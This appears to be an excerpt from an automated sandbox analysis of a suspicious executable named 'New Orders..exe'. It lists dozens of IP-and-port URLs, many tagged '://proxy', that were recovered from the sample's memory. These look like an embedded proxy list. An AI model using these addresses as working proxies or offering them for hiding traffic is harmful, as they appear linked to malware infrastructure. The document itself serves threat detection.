                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.207.217://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.207.217:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:46097
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:46097://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:49401
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:49401://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:61579
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:61579://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:46849
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:46849://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:58330
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:58330://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.69:53783
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.69:53783://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:34172
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:34172://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:41442
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:41442://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:46097
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:46097://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:50062
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:50062://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:53477
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:53477://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:31414
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:31414://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:35948
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:35948://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:37876
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:37876://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:40179
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:40179://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:49858
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:49858://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:53755
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:53755://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:57364
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:57364://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:57495
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:57495://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2658E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:31794
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:31794://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:44607
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:44607://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:44607p
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:45629
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:45629://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:50563
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:50563://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:59991
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:59991://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:60651
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.6.97:60651://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:34455
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:34455://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:51535
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.66.135:51535://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.70.64:49478
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.70.64:49478://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:35318
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:35318://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.102.207:9764
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.102.207:9764://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.55.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.55.12:59179
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.243.55.12:59179://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.253.68.97:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.253.68.97:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.131.178:16379
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.131.178:16379://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.137.49:16379
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.137.49:16379://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.147.9:16379
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.147.9:16379://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.153.194:16379
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.153.194:16379://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.165.36:16379
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.165.36:16379://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.171.22:16379
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.171.22:16379://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.94.175:38390
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.94.175:38390://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.132.170.100
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.132.170.100://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.132.170.100:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:52395
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:52395://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:59045
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:59045://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:50564
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:50564://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259D1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:57391
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:57391://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:60283
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:60283://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:64110
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:64110://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.227.154:5096
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.227.154:5096://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.236.214
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.236.214://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.236.214:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.46.193:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.46.193:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.225:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.225:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.226:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.226:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.67.238:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.67.238:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.22.96.68:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.22.96.68:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.225.240.95:10605
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.225.240.95:10605://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.112.138:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.112.138:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.95.2:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.95.2:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.232.158.60:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.232.158.60:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.232.89.116:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.232.89.116:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.121.127:45248
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.121.127:45248://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25695000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.121.127:45248p
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.38.100:8730
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.38.100:8730://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:16744
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:16744://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:49263
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:49263://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:37355
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:37355://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39452
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39452://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39533
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39533://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:41491
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:41491://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:46249
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:46249://proxy
